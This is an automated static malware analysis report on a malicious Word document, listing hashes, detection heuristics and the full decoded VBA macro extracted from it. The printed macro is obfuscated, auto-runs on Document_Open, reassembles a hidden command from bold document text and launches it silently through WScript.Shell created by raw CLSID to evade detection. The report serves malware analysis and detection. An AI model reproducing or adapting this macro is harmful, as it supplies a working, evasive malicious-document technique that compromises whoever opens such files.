Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cde8fc14b53fb793…

MALICIOUS

Office (OOXML)

155.7 KB Created: 2020-11-29 09:53:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-12-25
MD5: 1dcd19b1af53acdf6a0652f10b379d5c SHA-1: e06ab17595d4d2770bd6a80ed453b4a88022dac6 SHA-256: cde8fc14b53fb79318fad6a03d7c30c04309936b15eb7932072f681c34465158
172 Risk Score

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
    Set obj1 = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9191 bytes
SHA-256: 0e23bc3efe4d74472497cbc10e6ea02901865f2b45c4a6a1e9aa6ca5a90e3797
Detection
ClamAV: No threats found
Obfuscation or payload: likely
132 of 219 identifiers look randomly generated (e.g. 'kgvrlszquvdskkqxayybewqwokhnttlnmcbtcxkg') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Dim bprjmfp As String


Private Sub Document_Open()
Call nmngtyy
End Sub

Private Sub nmngtyy()












LLLLL



End Sub


Public Sub LLLLL()
If Cos(76.8765) = Log(12.42555) Then
Else
Call AsNXaUrp.BYsZgTqOo
End If
End Sub




Attribute VB_Name = "AsNXaUrp"
#If VBA7 Then


#Else


#End If

#If VBA7 Then
Private Declare PtrSafe Function ncgkixoi Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const zridde = 21

#Else
Private Declare Function ncgkixoi Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If


#If VBA7 Then
Const crktbpnl = 1732
Private Declare PtrSafe Function urbzpfup Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function urbzpfup Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If



#If VBA7 Then
Private Declare PtrSafe Function hsgoydtxat Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const szdunbvk = 6
#Else
Private Declare Function hsgoydtxat Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function gbqyubnp Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare  Function ncgkixoi Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const aorxbcpilpy = 57

Private Declare  Function urbzpfup Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare  Function hsgoydtxat Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare  Function gbqyubnp Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If

Private Type kdkota
     fcjwktwr As Long
End Type


#If VBA7 Then


#Else


#End If






Sub DqMhJ(sgbwvbShKbOgrjzLSSZZQhbQpEaAykA, GSbmTltgFLIfrxWxjSA, GqUKFLGqBSjabuZZHNsgZsTEZvYsidQf, ONQyRgIfCfnciExYxpVaULNWPkJmOIY)
pgkAXMgbrqbTknuFPCzuigXV = 4.59820241332336E+16
tHmZrsQOWzpqToBqn = 3977312751#
SLuXkGxbJhPrJIOjdFtCzyKFNnFPvOyDvmEKXVW = "bPjizfqgbkKvwluUApKxBiguiLwW"
DLIiNbk = 3.76284590276884E+17
bFiwYnKECHKskKi = "ZftiozniUcXYC"
End Sub

Function aApiHzWUbLcCKwUXRtUUtS(jKJFYjbAcuWpgE, dTtdwIihBabSzcwPlCpXzifmzjYCzMyTj, qJevFEAcIewQcYgelnrgmuoHeMkfipcIjClnlpwkX)
nhZnt = "vqGJOUnRwEkJNOQfgspSNYDQCdHyBAhMdbfVWt"
bhGUojLgElIBgyafWmqGlMoPvWXfmivJnxNlHDPg = 9.49581882866512E+33
xDMtyBOCwJigmKPsqYRLftWqyNjkpXSXJOnJc = 14382074147258#
wVJdpYNdAnxsQexUMDgW = 9604
aApiHzWUbLcCKwUXRtUUtS "lRdNYqKWXWGQVcvCCExdUMwnwGnaoCkcFaLEfPQi"
End Function

Function inojHpczhB(GcRrcv, BSKzjt, YVqQSCkiVldKvQrXmnOaNjev, LlYWrlsMznioyyfSYHf, SAmKuYMUSMoqvx, RLMdAlyvd)
yNbTZYtmystB = 8.8252890304889E+40
NGMdfcUEJBMkXlLXMrNwvTxkJbNEIeQplxVBc = "UFgGpMPjBmiPmAfFvuIbTDPPvekWyaPJvNXIPodlVaZ"
WtsQJgBasAfQpQLKbskbXYTY = "XpHQWGseptBmUNSYoRuiHSydTK"
qxDxZTmlrtKVtmmAXJXGfSCiH = "qWFqdxMeCgmvbTibaeevAwU"
bTvDwYvUqAcQgAQMJP = 2.11947875618804E+29
GObhEYErYDLYuBmPKBIhelRFbqRuaOR = "lMOEzmrfsgWRebiOulFLAiFUxWGNGKRJl"
nhmiPYJcpxOzazICzpIGmCG = "HdfeYhPNfGoAcLVhBXtIGxwHEEKbAemkatbmsfE"
hAUUKIanT = 6.56754623326837E+16
inojHpczhB "FOJymJgYaUXoNATDZjkipVTm"
End Function

Function ZeJVSPlXwHfZRkCMBLJuRreNtzAgtpttsEstJjlrnTt(GccwvdWHZZYbcGRGTFjktnUA, irDlljuXX, gEcerAgnbubwdScWQkBiTIboNlTWo, dEFZkBrbrjNzsFfmOkIPTKVpNYcnRFhJzlR, rDiaepsSUTPVIaXiNZVTj, LMYDJmCDzHoIuKCh, dSDUtIGeqiyvaPynbrVCbfGPRUIhAgM, fosBgvSESYTEDHZrqVTSgfIyLnCZ)
ntPvFmKbseihzwb = "PFdHOmgNrJCSaRGxxQ"
AkEaHeRANVLtMHSbiplABMB = 5.8053604064415E+41
wjrBaYl = "jXbiLfWcwlTrgPpKHpYHMQXnizdXnPZ"
kbKpgkQCTJDPtKYhugulzdXTznzLCyphMdG = 1.89387594832126E+19
EzeWZWn = "MHuXbv"
GVoqHDqqskEAVTWDPETduCXLdq = 93839194
GrtbkGViLXnzBNJllUVS = "qEeTISiExcNQikyzIUuzlKfcERPkQl"
HXmQnOIbnmeNuaiTdLmdzbSxfYCPqDxoMlFtv = "KkAtGNGwkCWxlZdIrg"
olPMtkkp = 3681689
BJUpXKACcGVFrinzssSYKDuZnHivXHIVXQub = "gaaYbfkLAxCbMAsSRfyOvBQcFeVyz"
anLSMSrzjXJOnJfTKHQDGkwNmfJyT = "KmLSWPQunZbRvaEhNHxmUNhwapqyghJsgnNXCUmQ"
ZeJVSPlXwHfZRkCMBLJuRreNtzAgtpttsEstJjlrnTt "QTqboo"
End Function

Function SfyUUwUYL(JERCBgbwEPsgYSOGQilIM, ftUgjEurUlBUobPGrzLQSmcFrkBMa, DgJcZYhUxXCNvGfEdnqJrmwvNsQOpyChRaiUKM, rZXCo, FrVanHOVQCRkNOh)
QlykUjIhIBvoBrnLAYRkwyUkGrDTuJWwOtqdXfh = "cgGfLedGgIvvHaySROecgomyfyZIB"
oUqjIProZbOx = "mNapovXLJBFBnuHAMEUFWTbEXSibdoCNi"
AlEJl = "dzfTliUVknMXtr"
SmVSVMwiUyrSltWw = 3050345767935#
SHbXoI = "oxNqpcfUrlhyirPBhQL"
tQibNrIEmQtedBdYyFs = 5.74262107653575E+21
SfyUUwUYL "TXbALXNMCGuGdnaXOlcyTaibsDUhNrCbXSBVpi"
End Function



Public Sub BYsZgTqOo()

On Error Resume Next



 
    'gcpuihphsepfpgogkj7312ywozbarf
'mtthrkhhhgvopebj



 Dim sepfpgogkj As Integer

  
        

'qdibjmpibvmljm35430
'9797





 Do Until 6418 = 6418
              Dim sjptydjepcn As Object
      Randomize
        Loop



'wqwokhnttlnmcbtcxkgvrlszquvd
'sjptydjepcnwdurmdcksvjttstlnmcbtcxkgvrlszquvd
'njpbumksvjttsskkqxayybe





'bvmljmsepfpgogkj35430
'ujpmmmqx7312
'dosubfbujpmmmqx18947887




        
'7312qdibjmpi
'1397
'35430sepfpgogkj
        
      
        
'gkkxippbskkqxayybewqwokhnttlnmcbtcxkgvrlszquvd
'lrmhewbgkgvrlszquvdtlnmcbtcxkgvrlszquvd



'cbntlfvhfwqwokhnthxtzrsnpmzwdurmdc
'tlnmcbtcxkgvrlszquvdtlnmcbtcxkgvrlszquvd
'skkqxayybelrmhewbgkgvrlszquvd






'qdibjmpi
'eghiudyujpmmmqx#Q14
'oocetwtwbcl
'18947887ujpmmmqx


   
             If oocetwtwbcl = "cocmmxx" Then
            Dim eghiudy
            
            oocetwtwbcl = 93818056901864#
        End If
        


        'xpvcipksvjttsksvjttskgvrlszquvdskkqxayybe
'kgvrlszquvdskkqxayybewqwokhnttlnmcbtcxkgvrlszquvd
'fhnwguikgvrlszquvdkgvrlszquvdskkqxayybe
'wdurmdcwqwokhntgkkxippbskkqxayybe
'ksvjttswqwokhntlrmhewbgkgvrlszquvd



        
        If IsDate(qhlgnpxqdz) And ((13 + 7312) / (18947887 + 7473870)) <> 45815829311408# Then
          xbqddutl = "mncwnt" & CStr("bpuqctlfa")
End If
        





'qnowqrdhksvjttsgkkxippbskkqxayybe
'hxtzrsnpmzwdurmdcgkkxippbskkqxayybe
'ywozbarfQ14
'hgvopebjQ11















   Dim myShape As InlineShape
    Dim myRange As Range
    For Each myRange In ActiveDocument.StoryRanges
        For Each myShape In myRange.InlineShapes
            myShape.Delete
        Next myShape
    Next myRange
Dim zxd As Variant
Dim zxtgsaqeyhzfgds3re As String



Dim oRng As Range
Dim oNewRng As Range
Set oRng = Selection.Range '(the formatted range you are wanting to write)
oRng.MoveEndWhile Chr(Abs(-32.1)), wdBackward 'Remove trailing spaces from the range
Set oNewRng = ActiveDocument.Range 'Locate the range where it is to be written
oNewRng.Collapse wdCollapseEnd
'oNewRng.FormattedText = oRng 'then write it.





 Dim Para As Paragraph
    Dim i As Long

    Application.ScreenUpdating = False
    With ActiveDocument
        For i = .Paragraphs.Count To 1 Step -1
            Set Para = .Paragraphs(i)
            With Para
                If .Range.End - .Range.Start = 1 Then
                    .Range.Delete
                Else
                    .SpaceBefore = 6
                    .SpaceAfter = 6
                End If
            End With
        Next i
    End With
    Application.ScreenUpdating = True




Dim singleLine As Paragraph
   Dim rng As Range
   Dim pos As Integer
    Dim Wrd As Range

   For Each singleLine In ActiveDocument.Paragraphs
      Set rng = singleLine.Range
   
   
    
    
         If rng.Font.Bold Then
            'MsgBox "This is bold"
               lineText = singleLine.Range.Text
          AWtbWDhas = AWtbWDhas + lineText
        
       ' MsgBox (AWtbWDhas)
         End If
     
   Next


WpkbB = "xOKhf"
fE = "JCT"
TDOvQ = "F"
vWYYg = 3561180
HKODnr = "ok"
YmBx = 4533856
Ddyd = "dUC"
TahIc = "QzrXkG"




ZFF = Null
VCFGv = ZFF

If Sin(2) + Cos(7.46) - 976.7654 = Cos(272) * 75.557 Then

MsgBox (CoNjMfBs)

Else

Do Until "LGRLh" <> "zslnu"
xZZI = "giQ"
xuTFy = 32437
XPK = 9889
rleIH = 552
rQSE = 774
nKtIZbQ = "ZoV"
xNLxG = "RbdaLC"
SRRmTQ = "MnK"
awYoHE = "nVKhuv"
lgAd = "Mzq"
LGRLh = zslnu
Loop


AWtbWDhas = Replace(AWtbWDhas, "dxphwrs", "")
End If

strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Dim k2 As String
    k2 = "Win32_ProcessStart" & "u" & "p"
    Set objStartUp = objWMIService.Get(k1)
    Set objProc = objWMIService.Get("Win32_Process")


Dim obj1
Set obj1 = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
obj1.Run Gravity & "" & AWtbWDhas, 0



End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 31744 bytes
SHA-256: 7f72bfa6536173c671f749e89c711e1b07842d97f628ac9c833b0b63d1b8e437
Detection
ClamAV: No threats found
Obfuscation or payload: likely
339 of 525 identifiers look randomly generated (e.g. 'kgvrlszquvdskkqxayybewqwokhnttlnmcbtcxkg') — consistent with name-mangling obfuscation.